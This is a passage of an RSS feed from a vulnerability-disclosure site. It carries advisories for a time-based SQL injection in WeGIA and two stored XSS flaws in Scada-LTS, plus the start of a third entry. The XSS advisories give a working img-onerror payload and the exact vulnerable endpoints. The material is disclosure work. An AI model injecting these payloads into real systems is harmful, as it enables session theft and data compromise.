	srcset=&amp;#34;/p/cve-2025-54062/image_hu_d68ef2828ab64648.png 480w, /p/cve-2025-54062/image_hu_73d0afd25a2a62ee.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;169&amp;#34;
		data-flex-basis=&amp;#34;406px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-f53c-f6jx-cm56&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-f53c-f6jx-cm56&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7728</title>
        <link>https://www.cvehunters.com/p/cve-2025-7728/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7728/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7728-cross-site-scripting-xss-stored-endpoint-usersshtm-parameter-username&amp;#34;&amp;gt;CVE-2025-7728: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7728&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7728&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7728-cross-site-scripting-xss-stored-endpoint-usersshtm-parameter-username&amp;#34;&amp;gt;CVE-2025-7728: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7728&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7728&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Register the payload in the &amp;lt;code&amp;gt;username&amp;lt;/code&amp;gt; field at the &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt; endpoint. After that, the XSS can be triggered by opening the &amp;lt;code&amp;gt;users.shtm&amp;lt;/code&amp;gt; page.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7728/image.png&amp;#34;
	width=&amp;#34;845&amp;#34;
	height=&amp;#34;719&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7728/image_hu_2812788e7819ccd3.png 480w, /p/cve-2025-7728/image_hu_9abb080d9b9ab836.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;117&amp;#34;
		data-flex-basis=&amp;#34;282px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7728/image-1.png&amp;#34;
	width=&amp;#34;1011&amp;#34;
	height=&amp;#34;549&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7728/image-1_hu_38f8c9818a1d9d3b.png 480w, /p/cve-2025-7728/image-1_hu_5a50be6addac808c.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;184&amp;#34;
		data-flex-basis=&amp;#34;441px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7728.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7728.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7729</title>
        <link>https://www.cvehunters.com/p/cve-2025-7729/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7729/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7729-cross-site-scripting-xss-stored-endpoint-usersprofilesshtm-parameter-userprofilename&amp;#34;&amp;gt;CVE-2025-7729: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7729&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7729&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7729-cross-site-scripting-xss-stored-endpoint-usersprofilesshtm-parameter-userprofilename&amp;#34;&amp;gt;CVE-2025-7729: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7729&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7729&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;usersProfiles.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;userprofilename&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7729/image.png&amp;#34;
	width=&amp;#34;1013&amp;#34;
	height=&amp;#34;541&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7729/image_hu_e21d105baa8d5ea3.png 480w, /p/cve-2025-7729/image_hu_770ae5c8de58bd9d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;449px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7729/image-1.png&amp;#34;
	width=&amp;#34;1011&amp;#34;
	height=&amp;#34;537&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7729/image-1_hu_5d649151d977a0d6.png 480w, /p/cve-2025-7729/image-1_hu_87877a04570b6134.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;188&amp;#34;
		data-flex-basis=&amp;#34;451px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7729.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-7729.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 17 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53929</title>
        <link>https://www.cvehunters.com/p/cve-2025-53929/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53929/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53929-cross-site-scripting-xss-stored-endpoint-adicionar_corphp-parameter-cor&amp;#34;&amp;gt;CVE-2025-53929: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_cor.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cor&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53929&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53929&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
